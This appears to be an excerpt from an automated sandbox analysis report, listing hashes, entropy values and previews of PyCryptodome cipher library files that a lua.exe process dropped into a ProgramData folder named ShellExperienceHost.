SSDEEP:	96:dEFQHvo7wHV2QRL34mghqko9uNizI3y5xU3a5tLVZCMKesDBC7IMgbfro20kqk9i:d6QHvT3GFA6Iywx2XQ0pF9kv
MD5:	5C3F9D1CED6DCAAC69EA791F03C76747
SHA1:	11591A2DEFFE9BE851FA59DFE7B67E1A0888DA93
SHA-256:	9BF053DE2A0DFC0B2307F9D8DD30F9C79A1FD90A9D11CA49A6B147934ED88F66
SHA-512:	ED09EA50F8A97E595DE8FB39B27F703F13FDC6A8FCAB73D905B4709CBF70C145C37BE508EC75BA311F44874B738F9618C825A987AB297B0292364DEE25EFE64C
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/PKCS1_OAEP.py : PKCS#1 OAEP..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\PKCS1_OAEP.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1214
Entropy (8bit):	4.8233945885346685
Encrypted:	false
SSDEEP:	24:1REjQFC19+1bs1zrhqMS8KDLYOT3OMIAl2HH8Myje+RGoziVEpvNtMEHo:gQFy+1o1IttDLteMI5aoJupVjHo
MD5:	A065FCD801FD38FDC5457C65A8B94801
SHA1:	7C353866EA0CFC0E55A90530714758115424B723
SHA-256:	DFEAE2746DEFD28744873401D008462C4C1EF4899B7BAFAEAE14FCA12A5BB73E
SHA-512:	959C65295EA6C93D67E7C1E5361A03C09CB7A37C7C64A92334A0C612952C3609708766780C99BD93DD5A9C23D79B7A3CF0C0614D083A13F3F9A8D5DBC3E6C7A2
Malicious:	false
Preview:	from typing import Optional, Union, Callable, Any, overload..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class HashLikeClass(Protocol):.. digest_size : int.. def new(self, data: Optional[bytes] = ...) -> Any: .......class HashLikeModule(Protocol):.. digest_size : int.. @staticmethod.. def new(data: Optional[bytes] = ...) -> Any: .......HashLike = Union[HashLikeClass, HashLikeModule]....Buffer = Union[bytes, bytearray, memoryview]....class PKCS1OAEP_Cipher:.. def __init__(self,.. key: RsaKey,.. hashAlgo: HashLike,.. mgfunc: Callable[[bytes, int], bytes],.. label: Buffer,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: RsaKey,.. hashAlgo: O

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\PKCS1_v1_5.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8142
Entropy (8bit):	4.853347582126467
Encrypted:	false
SSDEEP:	96:dtFQHvo04eHVtA3ZutH8MKDezPo1gZEdFTY3PANQ24Vs3T:drQHvM42MEK+gZEdFTY4NQF6T
MD5:	6440F928D502F1D73A451A1D0FE0DE47
SHA1:	404914F1B27CC7C6C0639937355BF07F80D239C6
SHA-256:	22E1A275FAB9C4B675FFCFD0A9C6A531DF90B574B682B737E2A21BDC33976BAC
SHA-512:	4B11C29136CC8C0645781609FAFD09E45967A4D64B03714864C125581035EFDEC51B48C7E4ED036AE87BDE4E5D93B9F029A70F968308C0E41FD7D4E59C366C9F
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/PKCS1-v1_5.py : PKCS#1 v1.5..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\PKCS1_v1_5.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	602
Entropy (8bit):	4.820398990357207
Encrypted:	false
SSDEEP:	12:1REYB1K+1bgBxpvIY3ONc1AlPcJZVyMnynj5wnZ0bd5AozPmJifJEjwZo:1REqK+1bspT3ONIAlUH8Myje+ZGozuMy
MD5:	AECC22000C62D3046FC82AB47CF21BDE
SHA1:	154E2B352E480AB38FBBDAFFE101BA568255B6EB
SHA-256:	FF25269A9A5F31F12790A10C6A3B03CB7BD9AD359EAE83A0BF5949A94D2D978B
SHA-512:	09EB1213CDAE5D22C808D9DEF54DF1F3B0CC759D3788C46B9155233E0DF085B88667D3D0981D6493769866EFD1E497909A990AC798C93BE4978F7241999FA869
Malicious:	false
Preview:	from typing import Callable, Union, Any, Optional....from Crypto.PublicKey.RSA import RsaKey....Buffer = Union[bytes, bytearray, memoryview]....class PKCS115_Cipher:.. def __init__(self,.. key: RsaKey,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer, sentinel: Buffer) -> bytes: .......def new(key: RsaKey,.. randfunc: Optional[Callable[[int], bytes]] = ...) -> PKCS115_Cipher: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\Salsa20.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6516
Entropy (8bit):	4.625878868247197
Encrypted:	false
SSDEEP:	96:GFQHvo7H4sIR05Jox+lgRXv8NBgQ9Qb3B0NpLPpnhtV8:UQHvMKDRXUNBgHGjRhtV8
MD5:	35B1A807346DF9FAD49A2396E0E7C64E
SHA1:	9A46CF85539233672C3ED0D06E4F1EE5B53BFB27
SHA-256:	80A7769DE32A81B8FB8CBE362066FF80711D630C0BEB39235246E4FD53E11870
SHA-512:	DF42F3A86A75FA52B2005A493B3E48CBDC0972CD81811C70308CB80D7006CE88FD6E9AA3393D2C687855030EF17A2031F4C8D5371888944FE8F8F2AC439C45C4
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/Salsa20.py : Salsa20 stream cipher (http://cr.yp.to/snuffle.html)..#..# Contributed by Fabrizio Tarizzo <fabrizio@fabriziotarizzo.org>...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\Salsa20.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	771
Entropy (8bit):	4.742681231468146
Encrypted:	false
SSDEEP:	24:1RElT3T37zFeBFAtnRNne3yFnR3Fne3rod8VYi:krheryvesLe71+i
MD5:	6C5EA68AB5BEDD5AE4A24BBC749A9CDD
SHA1:	806FAF7C023E17AB87A6108F9B91F5C4169E6037
SHA-256:	BADADDA30716689524A0798B1AF0DC0E7E81226EA4EE894D4E923347BAA7080C
SHA-512:	09226A5BC1E1E1B8806D88A7DC7ACD13B521CF14034E92F65211694D5D60ECB67866C4DB309E4488018126A752AFA8C1A5987F4417B3BF418A2590738FE4DBD2
Malicious:	false
Preview:	from typing import Union, Tuple, Optional, overload......Buffer = Union[bytes, bytearray, memoryview]....class Salsa20Cipher:.. nonce: bytes.. block_size: int.. key_size: int.... def __init__(self,.. key: Buffer,.. nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> Salsa20Cipher: .......block_size: int..key_size: Tuple[int, int]....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_ARC4.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.634288867523123
Encrypted:	false
SSDEEP:	96:e/8MwxTCa5Xv7BelL7u1R/r8qJ7pfpsPG6QEYHGBpUWCmNniHisDJ9UFv4:MTwxTltlelL7urFfUQaUNmYjDLU
MD5:	4CD3D1DE5990F98F722AB517C7D829F9
SHA1:	02E5B1457C761A4E6B7DBA0A18CDFF99FE764F45
SHA-256:	5C603D68BE4E47F1633A7C77A9404C5FC6ABF584B5F1EB274CC312829444C197
SHA-512:	9CD0F317163AB28EEBE6EA93521640CF36739E60BE6E5A1C1FE490E7920F12A9591E16DCCB50F934D30E892474AD21600592A51651EC5C0BF0D5DA20B4807F5C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................@......................@.......@.......@.......f.......f.......f.......f.......Rich............................PE..d...x.!`.........." ................T........................................p............`.........................................`'.......(..d....P.......@...............`..$....!...............................!..8............ ...............................text............................... ..`.rdata...... ......................@..@.data...H....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..$....`.....................@..B........................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_EKSBlowfish.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5336
Entropy (8bit):	4.836111981939897
Encrypted:	false
SSDEEP:	96:MHDqrYJALrYJHdt3EHGuITiwnHav1ZaVDYyOKgiaiJrJtk3I99m2Ht3HRF29:0qrskrs9t3q/ITHSVNi1bk3ITm6tXRY9
MD5:	A5F07807C63A0A82CFE7F644D72C9F9D
SHA1:	4F44ED26FD9770A9B8ED279C9E75FFEB2C84B756
SHA-256:	26B7450998B5E04410A77486C695457C58DCBC8DB24F50CC685651D223F3BE8E
SHA-512:	535FDCFDDDF7D64D097B0B51F64EBD14D453895B167E379D105E15F8F9681100B324A02004A3DD059B599EF88C01B81E0AD5546E90F1251EA2172BA5DF6D9252
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2019, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_EKSBlowfish.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	281
Entropy (8bit):	4.919666506917015
Encrypted:	false
SSDEEP:	6:1REYBNHK+kb/Vfw1ggHzrIY3MTDyo5Alm0Wgw0Tm6sRy/6WXHg:1REYBQ+kzlbgHvIY3YyogmvNZRy/O
MD5:	4030500BC383DEE6F4BBDF228147813E
SHA1:	DE9B1C78DD481B3B42A29AB5485C2C1B3EDFF182
SHA-256:	4917140D2EAE01669B206BEAB2164796D2DF836CFBD8ACCC9189CF4E6EEBEDB2
SHA-512:	FCAE9156019C79B2033E53F4F0626FD729F8B99F6EB73C837330D5AE079F19CCBA33A7EB2C72CC3055C365B2ED272AFCD7313310A9C2F1120EA16FF0E7AFF63A
Malicious:	false
Preview:	from typing import Union, Iterable....from Crypto.Cipher._mode_ecb import EcbMode....MODE_ECB: int....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: int,...salt: Buffer,...cost: int) -> EcbMode: .......block_size: int..key_size: Iterable[int]..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_Salsa20.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.010998805811913
Encrypted:	false
SSDEEP:	192:tUBpDmr37utd9PHv2DznuRGMeS4MUHNDLUYd:VDit6DCVn43ZUW
MD5:	86109D2D1FCCDB91968B7C1A63823731
SHA1:	89DEC67FBB4E467604F20C53C3AE3949471AEF58
SHA-256:	28EFD36BE6BBBC56A7219BED7CC132CE67BAF629100CC03A08A804360F483DB9
SHA-512:	5D331F7F3CA413E77C33FA57E1F07EF43D064545FF1D143B9086211B42BBE165564C62B07D7A44615E75221613F3D3127EF5D7C7EC06315F0C397C0B059D2A37
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................K........................&.......................................'............Rich....................PE..d...y.!`.........." ................T.....................................................`.........................................@8.......9..d....`.......P..L............p..$....1...............................1..8............0...............................text...x........................... ..`.rdata..2....0......................@..@.data...H....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..$....p.......4..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2923
Entropy (8bit):	4.69817669465711
Encrypted:	false
SSDEEP:	48:AF/1FvgfQq1B5GIDvOQ+Tl+1+L+r+yC+3+/+TJ+F+3+OUZzHfJUPdD9Bd+uTV/H+:m1FvWQq1jGIDvOQgl2oIpCcI0JqYwBHZ
MD5:	C0765E2C315E8F9736A7AABD7C92E132
SHA1:	61E185BB15AE453031CE0DFC166A0FA05A8B2138
SHA-256:	5EE4031AEDAC195C6528FC9705C342286DF2D8018348EB0279C7148EA85E8830
SHA-512:	3EA5E75439A504FC0CAA8683E62C7D07BC57A46480D260EDE8D53E985B9084E55730D2C93F68612354E6253424BDD258D363559108ADE942E5C4A24318B64F76
Malicious:	false
Preview:	#..# A block cipher is instantiated as a combination of:..# 1. A base cipher (such as AES)..# 2. A mode of operation (such as CBC)..#..# Both items are implemented as C modules...#..# The API of #1 is (replace "AES" with the name of the actual cipher):..# - AES_start_operaion(key) --> base_cipher_state..# - AES_encrypt(base_cipher_state, in, out, length)..# - AES_decrypt(base_cipher_state, in, out, length)..# - AES_stop_operation(base_cipher_state)..#..# Where base_cipher_state is AES_State, a struct with BlockBase (set of..# pointers to encrypt/decrypt/stop) followed by cipher-specific data...#..# The API of #2 is (replace "CBC" with the name of the actual mode):..# - CBC_start_operation(base_cipher_state) --> mode_state..# - CBC_encrypt(mode_state, in, out, length)..# - CBC_decrypt(mode_state, in, out, length)..# - CBC_stop_operation(mode_state)..#..# where mode_state is a a pointer to base_cipher_state plus mode-specific data.....import os....from Crypto.Cipher._mode_ecb import _cre

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_chacha20.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.031410931109326
Encrypted:	false
SSDEEP:	192:ahgUBpDmr37utd9PVv2Jnl0Ne3erKr5okiy0Y26RAr2Z9lkNCqDLU/:rDitwJooNiyX2GUA9f0U/
MD5:	D5FF7EFCB2FF37708545A5A1A845ED27
SHA1:	FD033AC437E69BDFFE2F3968F70236FEF58978ED
SHA-256:	5B0EBA9748B83DC2AAEF95ECAF12273A13768A2B5BAA5A8AC92EAC2F7076EBC8
SHA-512:	666D08D39DAE749A4E0F35829C6E396FFFC676750CBD2943010A6D034CE0C96DB395203CA29F6658931BE40B40A0D10E16A62667A76F66394960932193F67FD9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................K........................&.......................................'............Rich....................PE..d...y.!`.........." ................T.....................................................`..........................................7.......8..d....`.......P..d............p..$....1...............................1..8............0...............................text...(........................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..$....p.......2..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_cbc.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11244
Entropy (8bit):	4.597963804327609
Encrypted:	false
SSDEEP:	192:9qrskrs9t3q/IY/5xlJT9O+wU4/u+2U4OB0XgRz:0rskrs9VqLzJJ4TW+2TOBH
MD5:	58009BF442032E2D33A1E88E5C4EBF87
SHA1:	7834F9D2D8E73A2805080EB76CDAB592EFFF9877
SHA-256:	993D211D8E7DDC7454DC41950CDA0E2FAAF5702F1E681286D2BA050E55154E80
SHA-512:	D33CD37F4DE1A9E7F9FB6F046B29893F1565288A1D515B5F7BEDDA72016F9C0F7B277A0236DCDCB92A7C3855D8835D7D6CDB3189D4623AF41734BBB72F90E960
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_cbc.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	712
Entropy (8bit):	4.750220080456401
Encrypted:	false
SSDEEP:	12:1REYBw1+sJal9lvIY3FDHiIRyE1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT35istAY4nRNne3yFnR3Fne38
MD5:	30DD017C0985A1EFF693D631609C1DB6
SHA1:	378924C68A2872C951B6AB0291014CD3DD3C3B9C
SHA-256:	BCD20F1E0C545F56F186640614FEB8B125A2627F7A56F36DA2A3B2040EFE6FFC
SHA-512:	8029C5F0C2789E73A777C9F7609170DE099DDAF80CFDFDC912D2A48740661A5F831B729D7A2CCCC8A4A32CC22CE22480D4871615F49BCE958DB154B9120D4A3C
Malicious:	false
Preview:	from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CbcMode']....class CbcMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.... def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_ccm.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	25094
Entropy (8bit):	4.674975336383887
Encrypted:	false
SSDEEP:	192:9qrskrs9t3q/I+9n1nXrBamtA6/c1VCO37n2x46g4wCu4gDNMVRWPv8GxvBsm:0rskrs9Vqb1n71/wf2x40wYgJMXWHVv5
MD5:	4FBBB0B7FE61C1B2D17BCD67F84F0B36
SHA1:	F8CB6B3378D9F82153586C1954C8DC66DC4E0BEF
SHA-256:	344F44480530E5037326708499F1BB537EEE50BA618BC064BB1CBFE9ACEC5BA7
SHA-512:	C014C208B153BEE474257CE7AE2B4059C278634E80A49DDC4ACE39C2FEE80DE5DC34D7F5802FF1E2FFE04B86DDA7C336ACAE95EEB747653328B60E1CF56B6CD3
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_ccm.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1647
Entropy (8bit):	4.397477650476907
Encrypted:	false
SSDEEP:	24:1RM7CnbKT3fAbSUA9UUOHMnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cuuvUXUO8vesLeJLn8nlEF49
MD5:	91133F991531450E28EE3F680FBF6F20
SHA1:	BB3761FBD4A0F912A77258D73B30D7E43403130E
SHA-256:	5F0058DE990A9668E5B0CE2273E74E0D5BFDF79F5E6745DC9B8FAEB39822A9AD
SHA-512:	F5FAF2155B4D172D3DDAF556DF2EF28E5CE93CE81F471AED1D7215C658EF03C9DAB71FA3BDABD3133951A1A64EA628587F8390D330280518B2CA60F0E6451D74
Malicious:	false
Preview:	from types import ModuleType..from typing import Union, overload, Dict, Tuple, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CcmMode']....class CcmMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. msg_len: int,.. assoc_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> CcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str:

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_cfb.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11094
Entropy (8bit):	4.504866585165135
Encrypted:	false
SSDEEP:	96:dSMFQHvo5H4dIL3EwOOscx2JL5qwG47W9stU4p2EVQd7T1qytU4epqtAVwqWFCb0:dSCQHvAyOH2JLcOqwU4SkYU44bKCDmJ
MD5:	26656D5CE7FC3E84C56BFEC19C46841D
SHA1:	0A7A2C5389FB1262C37252F1773B83FAE82AB823
SHA-256:	46DBFCF49183DF0205351205BBCE291123560489858B1705269E7D13352CFE76
SHA-512:	968DD9A63F117391CC69FCCDFCB7F6369C8C384FCA547CE553843B2C9C71EAD3B3841F0D8FFFDB3A7CA9B8CB67C550E4CD640A5C93772CD090D5D737A238BC05
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/mode_cfb.py : CFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_cfb.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	753
Entropy (8bit):	4.690976940000698
Encrypted:	false
SSDEEP:	12:1REYBw1+sJal9lvIY3FDDHo2YRyU1AOlsQRZFq6R5pFq6jI33ynFq6R5xnFq6jIF:1REP+LjT3lGNAYsEHnRNne3yFnR3Fne1
MD5:	652CF8ED15152064BFF8807277058B5A
SHA1:	D868B6EBCDF4B5AE76DD495FBD506879BCE96B88
SHA-256:	FA48D3431DA67394394BCFC79AFA506311A5579E9234299215B06514EC72EDEA
SHA-512:	2354A738EBA79324311746672CFB436ECB558212FCFC044030A1C932F0E6EC74E539A38994A1BB7F69D5B84EB2C2F49EDAE11243A8D4B11B6B304425FBE8334F
Malicious:	false
Preview:	from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CfbMode']......class CfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer,.. segment_size: int) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_ctr.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16223
Entropy (8bit):	4.422387643250791
Encrypted:	false
SSDEEP:	192:d5QHvltxqH2LakMiITNEriO+uU44o2U4GzC1ShJnwBil3iYPlIidiSSZD:DeLF7AmT4o2TGzWShkaSCl6
MD5:	8C612FFA2067AA1C00936B97A8E3FE78
SHA1:	EE0D87DB76AB0924E98D1774DEA5FB30393613CB
SHA-256:	BFE65690717405B741A3E2CEDA97E7C9559BDD3798457FF9FB8982A7FEA56DB7
SHA-512:	8515496FB613E8A94C1C071D16E3904154C528FD7A0142AE29578F549C9856AE8ADBB3926E27160ACBFA933A88D51201AE49C8391ECD000BCBF2EC98CA7304BA
Malicious:	false
